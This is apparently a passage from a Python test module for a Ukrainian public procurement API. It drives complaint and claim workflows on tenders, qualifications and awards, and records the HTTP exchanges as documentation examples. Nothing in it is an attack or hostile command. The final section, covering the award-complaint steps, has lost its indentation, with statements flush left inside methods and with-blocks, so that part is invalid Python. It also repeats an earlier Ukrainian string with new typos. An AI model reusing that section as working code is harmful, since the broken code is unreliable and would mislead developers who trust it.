                    '/tenders/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, complaint7_id, complaint7_token),
                    {"data": {"status": "mistaken"}},
                )
                self.assertEqual(response.status, '200 OK')
        self.app.authorization = ('Basic', ('broker', ''))
        complaint_url = "/tenders/{}/complaints".format(self.tender_id)
        complaint8_id, complaint8_token = complaint_create_pending(self, complaint_url, complaint_data)

        self.app.authorization = ('Basic', ('reviewer', ''))
        with open(TARGET_DIR + 'complaints/complaint-post-reviewer-complaint-owner.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/complaints/{}/posts'.format(self.tender_id, complaint8_id),
                {"data": {
                    "title": "Уточнення по вимозі",
                    "description": "Відсутній документ",
                    "recipient": "complaint_owner",
                }})
            self.assertEqual(response.status, '201 Created')

        post1_id = response.json['data']['id']

        self.app.authorization = ('Basic', ('broker', ''))
        with open(TARGET_DIR + 'complaints/complaint-post-complaint-owner.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/complaints/{}/posts?acc_token={}'.format(
                    self.tender_id, complaint8_id, complaint8_token),
                {"data": {
                    "title": "Уточнення по вимозі",
                    "description": "Додано документ",
                    "recipient": "aboveThresholdReviewers",
                    "relatedPost": post1_id,
                    "documents": [{
                        'title': 'post_document_complaint.pdf',
                        'url': self.generate_docservice_url(),
                        'hash': 'md5:' + '0' * 32,
                        'format': 'application/pdf'
                    }]
                }})
            self.assertEqual(response.status, '201 Created')

        self.app.authorization = ('Basic', ('reviewer', ''))
        with open(TARGET_DIR + 'complaints/complaint-post-reviewer-tender-owner.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/complaints/{}/posts'.format(self.tender_id, complaint8_id),
                {"data": {
                    "title": "Уточнення по вимозі",
                    "description": "Відсутній документ",
                    "recipient": "tender_owner",
                }})
            self.assertEqual(response.status, '201 Created')

        post2_id = response.json['data']['id']

        self.app.authorization = ('Basic', ('broker', ''))
        with open(TARGET_DIR + 'complaints/complaint-post-tender-owner.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/complaints/{}/posts?acc_token={}'.format(
                    self.tender_id, complaint8_id, owner_token),
                {"data": {
                    "title": "Уточнення по вимозі",
                    "description": "Додано документ",
                    "recipient": "aboveThresholdReviewers",
                    "relatedPost": post2_id,
                    "documents": [{
                        'title': 'post_document_tender.pdf',
                        'url': self.generate_docservice_url(),
                        'hash': 'md5:' + '0' * 32,
                        'format': 'application/pdf'
                    }]
                }})
            self.assertEqual(response.status, '201 Created')

        with open(TARGET_DIR + 'complaints/complaints-list.http', 'w') as self.app.file_obj:
            self.app.authorization = None
            response = self.app.get('/tenders/{}/complaints'.format(self.tender_id))
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/complaint.http', 'w') as self.app.file_obj:
            self.app.authorization = None
            response = self.app.get('/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id))
            self.assertEqual(response.status, '200 OK')

    def test_qualification_complaints(self):
        self.app.authorization = ('Basic', ('broker', ''))

        response = self.app.post_json(
            '/tenders?opt_pretty=1',
            {'data': test_tender_data})
        self.assertEqual(response.status, '201 Created')

        tender = response.json['data']
        owner_token = response.json['access']['token']
        self.tender_id = tender['id']
        self.set_status("active.tendering")

        response = self.app.post_json(
            '/tenders/{}/bids'.format(self.tender_id),
            {'data': bid})
        bid_id = response.json['data']['id']
        bid_token = response.json['access']['token']

        response = self.app.patch_json(
            '/tenders/{}/bids/{}?acc_token={}'.format(self.tender_id, bid_id, bid_token),
            {'data': {"status": "pending"}})

        # create second bid
        self.app.authorization = ('Basic', ('broker', ''))
        self.create_bid(self.tender_id, bid2)

        # pre-qualification
        self.set_status('active.pre-qualification', {"id": self.tender_id, 'status': 'active.tendering'})
        self.check_chronograph()

        response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
        self.assertEqual(response.status, "200 OK")
        qualifications = response.json['data']

        for qualification in qualifications:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}?acc_token={}'.format(
                    self.tender_id, qualification['id'], owner_token),
                {"data": {
                    "status": "active",
                    "qualified": True,
                    "eligible": True
                }})
            self.assertEqual(response.status, "200 OK")

        self.tick()

        # switch to active.pre-qualification.stand-still
        response = self.app.patch_json(
            '/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
            {"data": {"status": "active.pre-qualification.stand-still"}})
        self.assertEqual(response.status, "200 OK")
        self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")

        qualification_id = qualifications[0]['id']
        with open(TARGET_DIR + 'complaints/qualification-complaint-submission.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
                    self.tender_id, qualification_id, bid_token),
                {'data': complaint})
            self.assertEqual(response.status, '201 Created')

        complaint1_token = response.json['access']['token']
        complaint1_id = response.json['data']['id']

        with open(TARGET_DIR + 'complaints/qualification-complaint-submission-upload.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/qualifications/{}/complaints/{}/documents?acc_token={}'.format(
                    self.tender_id, qualification_id, complaint1_id, complaint1_token),
                {"data": {
                    "title": "Complaint_Attachment.pdf",
                    "url": self.generate_docservice_url(),
                    "hash": "md5:" + "0" * 32,
                    "format": "application/pdf",
                }})
            self.assertEqual(response.status, '201 Created')

        with open(TARGET_DIR + 'complaints/qualification-complaint-complaint.http', 'w') as self.app.file_obj:
            if get_now() < RELEASE_2020_04_19:
                response = self.app.patch_json(
                    '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, qualification_id, complaint1_id, complaint1_token),
                    {"data": {"status": "pending"}})
            else:
                with change_auth(self.app, ("Basic", ("bot", ""))):
                    response = self.app.patch_json(
                        '/tenders/{}/qualifications/{}/complaints/{}'.format(
                            self.tender_id, qualification_id, complaint1_id),
                        {"data": {"status": "pending"}})
            self.assertEqual(response.status, '200 OK')

        complaint_data = {'data': complaint.copy()}
        complaint_url = "/tenders/{}/qualifications/{}/complaints".format(self.tender_id, qualification_id)
        complaint2_id, complaint2_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
        complaint3_id, complaint3_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
        complaint4_id, complaint4_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
        complaint5_id, complaint5_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)

        claim_data = {'data': claim.copy()}
        claim_data['data']['status'] = 'claim'

        with open(TARGET_DIR + 'complaints/qualification-complaint-submission-claim.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
                    self.tender_id, qualification_id, bid_token), claim_data)
            self.assertEqual(response.status, '201 Created')

        complaint6_token = response.json['access']['token']
        complaint6_id = response.json['data']['id']
        with open(TARGET_DIR + 'complaints/qualification-complaint-answer.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                    self.tender_id, qualification_id, complaint6_id, owner_token),
                {"data": {
                    "status": "answered",
                    "resolutionType": "resolved",
                    "resolution": "Умови виправлено, вибір переможця буде розглянуто повторно"
                }})
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/qualification-complaint-satisfy.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                    self.tender_id, qualification_id, complaint6_id, complaint6_token),
                {"data": {
                    "satisfied": True,
                }})
            self.assertEqual(response.status, '200 OK')

        response = self.app.post_json(
            '/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
                self.tender_id, qualification_id, bid_token), claim_data)
        self.assertEqual(response.status, '201 Created')
        complaint7_token = response.json['access']['token']
        complaint7_id = response.json['data']['id']

        response = self.app.patch_json(
            '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                self.tender_id, qualification_id, complaint7_id, owner_token),
            {'data': {
                "status": "answered",
                "resolutionType": "invalid",
                "resolution": "Вимога не відповідає предмету закупівлі"
            }})
        self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/qualification-complaint-unsatisfy.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                    self.tender_id, qualification_id, complaint7_id, complaint7_token),
                {"data": {
                    "satisfied": False,
                }})
            self.assertEqual(response.status, '200 OK')
        complaint_url = "/tenders/{}/qualifications/{}/complaints".format(self.tender_id, qualification_id)
        complaint8_id, complaint8_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)

        self.app.authorization = ('Basic', ('reviewer', ''))
        with open(TARGET_DIR + 'complaints/qualification-complaint-post-reviewer-complaint-owner.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/qualifications/{}/complaints/{}/posts'.format(
                    self.tender_id, qualification_id, complaint8_id),
                {"data": {
                    "title": "Уточнення по вимозі",
                    "description": "Відсутній документ",
                    "recipient": "complaint_owner",
                }})
            self.assertEqual(response.status, '201 Created')

        post1_id = response.json['data']['id']

        self.app.authorization = ('Basic', ('broker', ''))
        with open(TARGET_DIR + 'complaints/qualification-complaint-post-complaint-owner.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/qualifications/{}/complaints/{}/posts?acc_token={}'.format(
                    self.tender_id, qualification_id, complaint8_id, complaint8_token),
                {"data": {
                    "title": "Уточнення по вимозі",
                    "description": "Додано документ",
                    "recipient": "aboveThresholdReviewers",
                    "relatedPost": post1_id,
                    "documents": [{
                        'title': 'post_document_complaint.pdf',
                        'url': self.generate_docservice_url(),
                        'hash': 'md5:' + '0' * 32,
                        'format': 'application/pdf'
                    }]
                }})
            self.assertEqual(response.status, '201 Created')

        self.app.authorization = ('Basic', ('reviewer', ''))
        with open(TARGET_DIR + 'complaints/qualification-complaint-post-reviewer-tender-owner.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/qualifications/{}/complaints/{}/posts'.format(
                    self.tender_id, qualification_id, complaint8_id),
                {"data": {
                    "title": "Уточнення по вимозі",
                    "description": "Відсутній документ",
                    "recipient": "tender_owner",
                }})
            self.assertEqual(response.status, '201 Created')

        post2_id = response.json['data']['id']

        self.app.authorization = ('Basic', ('broker', ''))
        with open(TARGET_DIR + 'complaints/qualification-complaint-post-tender-owner.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/qualifications/{}/complaints/{}/posts?acc_token={}'.format(
                    self.tender_id, qualification_id, complaint8_id, owner_token),
                {"data": {
                    "title": "Уточнення по вимозі",
                    "description": "Додано документ",
                    "recipient": "aboveThresholdReviewers",
                    "relatedPost": post2_id,
                    "documents": [{
                        'title': 'post_document_tender.pdf',
                        'url': self.generate_docservice_url(),
                        'hash': 'md5:' + '0' * 32,
                        'format': 'application/pdf'
                    }]
                }})
            self.assertEqual(response.status, '201 Created')
        response = self.app.post_json(
            '/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
                self.tender_id, qualification_id, bid_token),
            {'data': claim})
        self.assertEqual(response.status, '201 Created')

        with open(TARGET_DIR + 'complaints/qualification-complaint-claim.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                    self.tender_id, qualification_id,
                    response.json['data']['id'], response.json['access']['token']),
                {"data": {
                    "status": "claim"
                }})
            self.assertEqual(response.status, '200 OK')

        if get_now() < RELEASE_2020_04_19:
            # before RELEASE_2020_04_19 the pending -> mistaken transition was performed by the reviewer
            self.app.authorization = ('Basic', ('broker', ''))
            complaint9_id, complaint9_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)

            with open(TARGET_DIR + 'complaints/qualification-complaint-mistaken.http', 'w') as self.app.file_obj:
                self.app.authorization = ('Basic', ('reviewer', ''))
                response = self.app.patch_json(
                    '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, qualification_id, complaint9_id, complaint9_token),
                    {"data": {"status": "mistaken"}},
                )
                self.assertEqual(response.status, '200 OK')
        else:
            # since RELEASE_2020_04_19 the draft -> mistaken transition is performed by the complainant
            self.app.authorization = ('Basic', ('broker', ''))
            response = self.app.post_json(
                '/tenders/{}/qualifications/{}/complaints?acc_token={}'.format(
                    self.tender_id, qualification_id, bid_token),
                {'data': complaint}
            )
            self.assertEqual(response.status, '201 Created')
            complaint9_id = response.json['data']['id']
            complaint9_token = response.json['access']['token']

            with open(TARGET_DIR + 'complaints/qualification-complaint-mistaken-2020-04-19.http', 'w') as self.app.file_obj:
                response = self.app.patch_json(
                    '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, qualification_id, complaint9_id, complaint9_token),
                    {"data": {"status": "mistaken"}},
                )
                self.assertEqual(response.status, '200 OK')
        self.app.authorization = ('Basic', ('reviewer', ''))
        with open(TARGET_DIR + 'complaints/qualification-complaint-reject.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}'.format(
                    self.tender_id, qualification_id, complaint2_id),
                {"data": {
                    "status": "invalid",
                    "rejectReason": "alreadyExists"
                }})
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/qualification-complaint-accept.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}'.format(
                    self.tender_id, qualification_id, complaint1_id),
                {"data": {
                    "status": "accepted",
                    "reviewDate": get_now().isoformat(),
                    "reviewPlace": "Place of review"
                }})
            self.assertEqual(response.status, '200 OK')

        # accept the remaining pending complaints the same way
        for accepted_complaint_id in (complaint3_id, complaint4_id, complaint5_id):
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}'.format(
                    self.tender_id, qualification_id, accepted_complaint_id),
                {"data": {
                    "status": "accepted",
                    "reviewDate": get_now().isoformat(),
                    "reviewPlace": "Place of review"
                }})
            self.assertEqual(response.status, '200 OK')
        with open(TARGET_DIR + 'complaints/qualification-complaint-resolution-upload.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/qualifications/{}/complaints/{}/documents'.format(
                    self.tender_id, qualification_id, complaint1_id),
                {"data": {
                    "title": "ComplaintResolution.pdf",
                    "url": self.generate_docservice_url(),
                    "hash": "md5:" + "0" * 32,
                    "format": "application/pdf",
                }})
            self.assertEqual(response.status, '201 Created')

        with open(TARGET_DIR + 'complaints/qualification-complaint-resolve.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}'.format(
                    self.tender_id, qualification_id, complaint1_id),
                {"data": {
                    "status": "satisfied"
                }})
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/qualification-complaint-decline.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}'.format(
                    self.tender_id, qualification_id, complaint3_id),
                {"data": {
                    "status": "declined"
                }})
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/qualification-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}'.format(
                    self.tender_id, qualification_id, complaint5_id),
                {"data": {
                    "decision": "Тендер скасовується замовником",
                    "status": "stopped",
                    "rejectReason": "tenderCancelled"
                }})
            self.assertEqual(response.status, '200 OK')
        self.app.authorization = ('Basic', ('broker', ''))
        with open(TARGET_DIR + 'complaints/qualification-complaint-resolved.http', 'w') as self.app.file_obj:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                    self.tender_id, qualification_id, complaint1_id, owner_token),
                {"data": {
                    "tendererAction": "Умови виправлено",
                    "status": "resolved"
                }})
            self.assertEqual(response.status, '200 OK')

        if get_now() < RELEASE_2020_04_19:
            with open(TARGET_DIR + 'complaints/qualification-complaint-accepted-stopping.http', 'w') as self.app.file_obj:
                response = self.app.patch_json(
                    '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, qualification_id, complaint4_id, complaint4_token),
                    {"data": {
                        "cancellationReason": "Тендер скасовується замовником",
                        "status": "stopping"
                    }},
                    status=200,
                )
                self.assertEqual(response.status, '200 OK')

            self.app.authorization = ('Basic', ('reviewer', ''))
            with open(TARGET_DIR + 'complaints/qualification-complaint-stopping-stopped.http', 'w') as self.app.file_obj:
                response = self.app.patch_json(
                    '/tenders/{}/qualifications/{}/complaints/{}'.format(
                        self.tender_id, qualification_id, complaint4_id),
                    {"data": {
                        "decision": "Тендер скасовується замовником",
                        "status": "stopped",
                        "rejectReason": "tenderCancelled"
                    }})
                self.assertEqual(response.status, '200 OK')
        else:
            with open(TARGET_DIR + 'complaints/qualification-complaint-accepted-stopping-2020-04-19.http', 'w') as self.app.file_obj:
                response = self.app.patch_json(
                    '/tenders/{}/qualifications/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, qualification_id, complaint4_id, complaint4_token),
                    {"data": {
                        "cancellationReason": "Тендер скасовується замовником",
                        "status": "stopping"
                    }},
                    status=403,
                )
                self.assertEqual(response.status, '403 Forbidden')

        self.app.authorization = None
        with open(TARGET_DIR + 'complaints/qualification-complaints-list.http', 'w') as self.app.file_obj:
            response = self.app.get(
                '/tenders/{}/qualifications/{}/complaints'.format(self.tender_id, qualification_id))
            self.assertEqual(response.status, '200 OK')

        with open(TARGET_DIR + 'complaints/qualification-complaint.http', 'w') as self.app.file_obj:
            response = self.app.get(
                '/tenders/{}/qualifications/{}/complaints/{}'.format(
                    self.tender_id, qualification_id, complaint1_id))
            self.assertEqual(response.status, '200 OK')

    def test_award_complaints(self):
        self.app.authorization = ('Basic', ('broker', ''))

        response = self.app.post_json(
            '/tenders?opt_pretty=1',
            {'data': test_tender_data})
        self.assertEqual(response.status, '201 Created')

        tender = response.json['data']
        owner_token = response.json['access']['token']
        self.tender_id = tender['id']
        self.set_status("active.tendering")

        response = self.app.post_json(
            '/tenders/{}/bids'.format(self.tender_id),
            {'data': bid})
        bid_id = response.json['data']['id']
        bid_token = response.json['access']['token']

        response = self.app.patch_json(
            '/tenders/{}/bids/{}?acc_token={}'.format(self.tender_id, bid_id, bid_token),
            {'data': {"status": "pending"}})

        # create second bid
        self.app.authorization = ('Basic', ('broker', ''))
        self.create_bid(self.tender_id, bid2)
        # response = self.app.post_json(
        #     '/tenders/{}/bids'.format(self.tender_id),
        #     {'data': bid2})

        # pre-qualification
        self.set_status(
            'active.pre-qualification',
            {"id": self.tender_id, 'status': 'active.tendering'})
        self.check_chronograph()

        response = self.app.get('/tenders/{}/qualifications'.format(self.tender_id))
        self.assertEqual(response.status, "200 OK")
        qualifications = response.json['data']

        for qualification in qualifications:
            response = self.app.patch_json(
                '/tenders/{}/qualifications/{}?acc_token={}'.format(
                    self.tender_id, qualification['id'], owner_token),
                {"data": {
                    "status": "active",
                    "qualified": True,
                    "eligible": True
                }})
            self.assertEqual(response.status, "200 OK")

        # switch to active.pre-qualification.stand-still
        response = self.app.patch_json(
            '/tenders/{}?acc_token={}'.format(self.tender_id, owner_token),
            {"data": {"status": "active.pre-qualification.stand-still"}})
        self.assertEqual(response.status, "200 OK")
        self.assertEqual(response.json['data']['status'], "active.pre-qualification.stand-still")

        # switch to active.auction
        self.set_status('active.auction')
        self.app.authorization = ('Basic', ('auction', ''))
        response = self.app.get('/tenders/{}/auction'.format(self.tender_id))
        auction_bids_data = response.json['data']['bids']
        for b in auction_bids_data:
            b.pop("status", None)
        self.app.post_json(
            '/tenders/{}/auction'.format(self.tender_id),
            {'data': {'bids': auction_bids_data}})

        self.app.authorization = ('Basic', ('broker', ''))
        response = self.app.get('/tenders/{}/awards?acc_token={}'.format(self.tender_id, owner_token))
        # get the pending award
        award_id = [i['id'] for i in response.json['data'] if i['status'] == 'pending'][0]

        response = self.app.patch_json(
            '/tenders/{}/awards/{}?acc_token={}'.format(self.tender_id, award_id, owner_token),
            {"data": {
                "status": "active",
                "qualified": True,
                "eligible": True
            }})
        self.assertEqual(response.status, '200 OK')
        self.tick()
        with open(TARGET_DIR + 'complaints/award-complaint-submission.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/awards/{}/complaints?acc_token={}'.format(
                    self.tender_id, award_id, bid_token),
                {'data': complaint})
            self.assertEqual(response.status, '201 Created')

        self.tick()
        complaint1_token = response.json['access']['token']
        complaint1_id = response.json['data']['id']

        with open(TARGET_DIR + 'complaints/award-complaint-submission-upload.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/awards/{}/complaints/{}/documents?acc_token={}'.format(
                    self.tender_id, award_id, complaint1_id, complaint1_token),
                {"data": {
                    "title": "Complaint_Attachment.pdf",
                    "url": self.generate_docservice_url(),
                    "hash": "md5:" + "0" * 32,
                    "format": "application/pdf",
                }})
            self.assertEqual(response.status, '201 Created')

        with open(TARGET_DIR + 'complaints/award-complaint-complaint.http', 'w') as self.app.file_obj:
            if get_now() < RELEASE_2020_04_19:
                response = self.app.patch_json(
                    '/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
                        self.tender_id, award_id, complaint1_id, complaint1_token),
                    {"data": {"status": "pending"}})
            else:
                with change_auth(self.app, ("Basic", ("bot", ""))):
                    response = self.app.patch_json(
                        '/tenders/{}/awards/{}/complaints/{}'.format(
                            self.tender_id, award_id, complaint1_id),
                        {"data": {"status": "pending"}})
            self.assertEqual(response.status, '200 OK')
        complaint_data = {'data': complaint.copy()}
        # with open(TARGET_DIR + 'complaints/award-complaint-submission-complaint.http', 'w') as self.app.file_obj:
        #     response = self.app.post_json(
        #         '/tenders/{}/awards/{}/complaints?acc_token={}'.format(
        #             self.tender_id, award_id, bid_token),
        #         complaint_data)
        #     self.assertEqual(response.status, '201 Created')
        #
        #     complaint2_id = response.json['data']['id']

        complaint_url = "/tenders/{}/awards/{}/complaints".format(self.tender_id, award_id)
        complaint2_id, complaint2_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
        complaint3_id, complaint3_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
        complaint4_id, complaint4_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
        complaint5_id, complaint5_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)

        claim_data = {'data': claim.copy()}
        claim_data['data']['status'] = 'claim'

        with open(TARGET_DIR + 'complaints/award-complaint-submission-claim.http', 'w') as self.app.file_obj:
            response = self.app.post_json(
                '/tenders/{}/awards/{}/complaints?acc_token={}'.format(
                    self.tender_id, award_id, bid_token), claim_data)
            self.assertEqual(response.status, '201 Created')

        complaint6_token = response.json['access']['token']
        complaint6_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/award-complaint-answer.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint6_id, owner_token),
{'data': {
"status": "answered",
"resolutionType": "resolved",
"resolution": "Умови виправлено, вибір переможня буде розгянуто повторно"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-satisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint6_id, complaint6_token),
{'data': {
"satisfied": True,
}})
self.assertEqual(response.status, '200 OK')
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token), claim_data)
self.assertEqual(response.status, '201 Created')
complaint7_token = response.json['access']['token']
complaint7_id = response.json['data']['id']
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint7_id, owner_token),
{'data': {
"status": "answered",
"resolutionType": "invalid",
"resolution": "Вимога не відповідає предмету закупівлі"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-unsatisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id, complaint7_id, complaint7_token),
{'data': {
"satisfied": False,
}})
self.assertEqual(response.status, '200 OK')
complaint_url = "/tenders/{}/awards/{}/complaints".format(self.tender_id, award_id)
complaint8_id, complaint8_token = complaint_create_pending(self, complaint_url, complaint_data, bid_token)
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/award-complaint-post-reviewer-complaint-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/posts'.format(
self.tender_id, award_id, complaint8_id),
{"data": {
"title": "Уточнення по вимозі",
"description": "Відсутній документ",
"recipient": "complaint_owner",
}})
self.assertEqual(response.status, '201 Created')
post1_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/award-complaint-post-complaint-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/posts?acc_token={}'.format(
self.tender_id, award_id, complaint8_id, complaint8_token),
{"data": {
"title": "Уточнення по вимозі",
"description": "Додано документ",
"recipient": "aboveThresholdReviewers",
"relatedPost": post1_id,
"documents": [{
'title': 'post_document_complaint.pdf',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/pdf'
}]
}})
self.assertEqual(response.status, '201 Created')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/award-complaint-post-reviewer-tender-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/posts'.format(
self.tender_id, award_id, complaint8_id),
{"data": {
"title": "Уточнення по вимозі",
"description": "Відсутній документ",
"recipient": "tender_owner",
}})
self.assertEqual(response.status, '201 Created')
post2_id = response.json['data']['id']
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/award-complaint-post-tender-owner.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/posts?acc_token={}'.format(
self.tender_id, award_id, complaint8_id, owner_token),
{"data": {
"title": "Уточнення по вимозі",
"description": "Додано документ",
"recipient": "aboveThresholdReviewers",
"relatedPost": post2_id,
"documents": [{
'title': 'post_document_tender.pdf',
'url': self.generate_docservice_url(),
'hash': 'md5:' + '0' * 32,
'format': 'application/pdf'
}]
}})
self.assertEqual(response.status, '201 Created')
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints?acc_token={}'.format(
self.tender_id, award_id, bid_token),
{'data': claim})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/award-complaint-claim.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}?acc_token={}'.format(
self.tender_id, award_id,
response.json['data']['id'], response.json['access']['token']),
{'data': {
"status": "claim"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/award-complaint-reject.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint2_id),
{'data': {
"status": "invalid",
"rejectReason": "alreadyExists"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-accept.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
for accepted_complaint_id in (complaint3_id, complaint4_id, complaint5_id):
    response = self.app.patch_json(
        '/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, accepted_complaint_id),
        {'data': {
            "status": "accepted",
            "reviewDate": get_now().isoformat(),
            "reviewPlace": "Place of review"
        }})
    self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-resolution-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/awards/{}/complaints/{}/documents'.format(
self.tender_id, award_id, complaint1_id),
{"data": {
"title": "ComplaintResolution.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/award-complaint-resolve.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint1_id),
{'data': {
"status": "satisfied"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-decline.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint3_id),
{'data': {
"status": "declined"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/awards/{}/complaints/{}'.format(self.tender_id, award_id, complaint5_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/award-complaints-list.http', 'w') as self.app.file_obj:
self.app.authorization = None
response = self.app.get('/tenders/{}/awards/{}/complaints'.format(self.tender_id, award_id))
self.assertEqual(response.status, '200 OK')
